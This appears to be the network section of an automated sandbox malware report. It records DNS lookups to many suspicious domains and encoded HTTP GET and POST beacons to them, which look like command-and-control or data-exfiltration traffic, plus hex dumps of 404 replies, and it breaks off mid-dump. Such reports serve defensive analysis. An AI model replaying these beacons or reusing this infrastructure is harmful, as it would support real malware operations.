                Source: DNS query: www.dating-apps-az-dn5.xyz
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 209.74.77.107 209.74.77.107
                Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
                Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global traffic | HTTP traffic detected: GET /8ewn/?RZ=0nkpmZbx9Z4P2&BHptZ6F=MQU8hgqJCfJkKwurq5QXSTcsAScUHw3Ryuy9I29ewyrFHLJiO5EUJc8dhjLhkP1w+kMFiKX1Jf9ni3jKt1WG/ZpblKXuHNDxI7tmrBLFv1SmPdd+ShDH4FU= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Host: www.remedies.pro | Connection: close | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /440l/?BHptZ6F=9t5r8PtstBUGfqpIeh5XnEiswD9luMiEeVsajtw7Z3dqDkGB8mLGChY9CqfKEaHyEvKJDzANYYXJmO8Xh0K1SfJD5xex/OhwsPZZ5DEaSUshfqY+26Bd8yM=&RZ=0nkpmZbx9Z4P2 HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Host: www.egyshare.xyz | Connection: close | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /8mlm/?BHptZ6F=Dou+d174n903Q5s8eGVlbncTBC0Rpufru8Nex+2NzpzCLkW84PIBEnPU/VIOuudaHO13J+F+WsJAELWMIa4GeHkI0XjsMpOmPR3vOajhWYhkzVz3w31CV1o=&RZ=0nkpmZbx9Z4P2 HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Host: www.appsolucao.shop | Connection: close | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /3ifu/?BHptZ6F=u5oj/oWevlm54LOT1+Bryx675u+IDrtDZr257qJzt/2kXoBMan19x+0MdpxIfeL/WChZbD4JNYT/SNFPC81SuzkGtR7263FvFtQ21l4S/sR8VHVbXOTd4oM=&RZ=0nkpmZbx9Z4P2 HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Host: www.samundri.online | Connection: close | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /4ii9/?RZ=0nkpmZbx9Z4P2&BHptZ6F=DCK/bgCIPtpt2RJApr/S57a5c6dyUmc4/YRC2H7mEi+GV8MabGqvART7ZhzmedatEBHVT2HbXE2R9ehhzokwzGc74R/EcNhRi8s6fgxoYqpZFSK7yfL6tiw= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Host: www.happyjam.life | Connection: close | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /sa1b/?BHptZ6F=XYHJVoT0LuIOm26Tyq9N91avW6u0HKWTSvSmIrnltmLk6JYzFfgCVHRXJm9nnHtkqw/GQg9hdUic1chKWcYHIwgC/tmXBuLbW2sUc5PcpWY1XILnhN44V5I=&RZ=0nkpmZbx9Z4P2 HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Host: www.t19yd.top | Connection: close | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /gua3/?RZ=0nkpmZbx9Z4P2&BHptZ6F=PEExTvPebnfdN5xst02JMzGti5FnGkiLE22WiywfEIelsbdwqCVd6ByVLBEklw1lRQ+mhNbJQBi9PlJBFsZX42nwE3ew6u8Wba+OVKdJMXKWWGbfqYbjt0U= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Host: www.atendefacil.info | Connection: close | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /k4tn/?RZ=0nkpmZbx9Z4P2&BHptZ6F=UszxsXnyXaHrix4mOaqJD7vMyBmxMOeCUNKfuMYEqjdUerJZ7q+fEOQwPEbVbpTJrGRa9GB6/NRWLuSsaWPLUhjS0DDan+QLtyBM3L4kv6zOvH8nY/xHjUE= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Host: www.sitioseguro.blog | Connection: close | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /tskk/?BHptZ6F=o5GB+IawIAU5T0thXdQTAhCz8F67YQPQT/nwZCkciWz+LkCAD5WzKPOp+WFYKDZnS0ikteADWtOd2j97JYt8nhoktlw8l2JH1Fe3FVr0kJJ2WjNY2yZGKR8=&RZ=0nkpmZbx9Z4P2 HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Host: www.dating-apps-az-dn5.xyz | Connection: close | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /27s6/?RZ=0nkpmZbx9Z4P2&BHptZ6F=3HPpqXJ7+KzZdUbztAJQoIdlDoC5J9hYXz+VcheInCeAf0Mmt05i/k62iF4aOsJa+VYW+vyKTPXBSx5msm7TgI/vrOYQcOVU79uPxUHt14iAAYzPN76r48s= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Host: www.whisperart.net | Connection: close | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /ez1t/?BHptZ6F=6fEYs/GnwtqWMztB9xFdTpyVwIgq4y66Lrjdt5EE8ztyQFcx1ZWnbcrnPkjaT/5aXxdNApMw2aINlctYTPbgIAplS4neSxI29SjRMg4iVPNQf+tma6zkIeo=&RZ=0nkpmZbx9Z4P2 HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Host: www.ana-silverco.shop | Connection: close | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /qimy/?RZ=0nkpmZbx9Z4P2&BHptZ6F=pW0RMLgj0GfOcOfjNX4uT4TVFqcCQcjlkxVMBko6hSeAFIxekhL2UZBCo0je72bj3vEDDI4oJlEiagEhjxGQsrVSq8B3cYE1WLpspuVk6wMXVtPZnEUyIhQ= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Host: www.bloodbalancecaps.shop | Connection: close | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                Source: global traffic | DNS traffic detected: DNS query: www.betmatchx.online
                Source: global traffic | DNS traffic detected: DNS query: www.egldfi.xyz
                Source: global traffic | DNS traffic detected: DNS query: www.remedies.pro
                Source: global traffic | DNS traffic detected: DNS query: www.egyshare.xyz
                Source: global traffic | DNS traffic detected: DNS query: www.appsolucao.shop
                Source: global traffic | DNS traffic detected: DNS query: www.samundri.online
                Source: global traffic | DNS traffic detected: DNS query: www.happyjam.life
                Source: global traffic | DNS traffic detected: DNS query: www.t19yd.top
                Source: global traffic | DNS traffic detected: DNS query: www.atendefacil.info
                Source: global traffic | DNS traffic detected: DNS query: www.uynline.shop
                Source: global traffic | DNS traffic detected: DNS query: www.sitioseguro.blog
                Source: global traffic | DNS traffic detected: DNS query: www.dating-apps-az-dn5.xyz
                Source: global traffic | DNS traffic detected: DNS query: www.whisperart.net
                Source: global traffic | DNS traffic detected: DNS query: www.ana-silverco.shop
                Source: global traffic | DNS traffic detected: DNS query: www.bloodbalancecaps.shop
                Source: unknownHTTP traffic detected: POST /440l/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brHost: www.egyshare.xyzOrigin: http://www.egyshare.xyzContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Connection: closeContent-Length: 204Referer: http://www.egyshare.xyz/440l/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36Data Raw: 42 48 70 74 5a 36 46 3d 77 76 52 4c 2f 37 41 6a 6a 45 63 5a 49 4a 5a 47 53 48 64 42 7a 55 76 70 79 43 4e 67 6c 59 4f 65 53 48 45 37 73 71 4a 42 62 6d 70 67 42 33 32 50 78 6b 6a 48 4c 57 6b 33 4f 62 72 45 66 4f 54 2f 41 2b 65 77 50 30 46 47 65 4e 48 72 6d 2b 49 71 2b 56 66 48 5a 76 74 36 37 54 36 57 39 73 39 72 69 50 6c 38 6d 56 63 34 46 52 4d 35 62 4d 5a 4d 39 5a 4a 58 39 6c 6d 4c 73 41 73 33 47 74 70 31 48 33 50 30 31 6e 44 2b 34 63 38 62 68 69 42 72 6e 34 38 55 6a 70 6f 65 66 55 5a 34 42 65 49 62 71 2f 63 68 47 7a 73 57 35 2b 65 73 31 66 31 6f 6b 62 69 34 74 52 77 49 38 43 63 64 4a 78 2b 48 44 77 3d 3d Data Ascii: BHptZ6F=wvRL/7AjjEcZIJZGSHdBzUvpyCNglYOeSHE7sqJBbmpgB32PxkjHLWk3ObrEfOT/A+ewP0FGeNHrm+Iq+VfHZvt67T6W9s9riPl8mVc4FRM5bMZM9ZJX9lmLsAs3Gtp1H3P01nD+4c8bhiBrn48UjpoefUZ4BeIbq/chGzsW5+es1f1okbi4tRwI8CcdJx+HDw==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 16:37:07 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 16:37:10 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 16:37:13 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 16:37:15 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 06 Dec 2024 16:37:23 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6693de8b-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 06 Dec 2024 16:37:25 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6693de8b-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 06 Dec 2024 16:37:28 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6693de8b-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 06 Dec 2024 16:37:31 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6693de8b-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 16:37:38 GMTServer: Apache/2Content-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 16:37:41 GMTServer: Apache/2Content-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 